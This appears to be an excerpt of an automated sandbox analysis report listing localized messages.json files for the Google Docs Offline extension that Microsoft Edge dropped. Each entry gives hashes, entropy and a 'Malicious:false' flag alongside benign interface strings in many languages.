                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                            Entropy (8bit):4.633956349931516
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                            MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                            SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                            SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                            SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):838
                                                                                                                                                                            Entropy (8bit):4.4975520913636595
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                            MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                            SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                            SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                            SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                            Entropy (8bit):4.673517697192589
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                            MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                            SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                            SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                            SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):911
                                                                                                                                                                            Entropy (8bit):4.6294343834070935
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                            MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                            SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                            SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                            SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):939
                                                                                                                                                                            Entropy (8bit):4.451724169062555
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                            MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                            SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                            SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                            SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                            Entropy (8bit):4.622066056638277
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                            MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                            SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                            SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                            SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):972
                                                                                                                                                                            Entropy (8bit):4.621319511196614
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                            MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                            SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                            SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                            SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):990
                                                                                                                                                                            Entropy (8bit):4.497202347098541
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                            MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                            SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                            SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                            SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                            Entropy (8bit):4.294833932445159
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                            MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                            SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                            SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                            SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1672
                                                                                                                                                                            Entropy (8bit):4.314484457325167
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                            MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                            SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                            SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                            SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):935
                                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                            MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                            SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                            SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                            SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                            MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                            SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                            SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                            SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2771
                                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                            MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                            SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                            SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                            SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):858
                                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                            MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                            SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                            SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                            SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                            Malicious:false
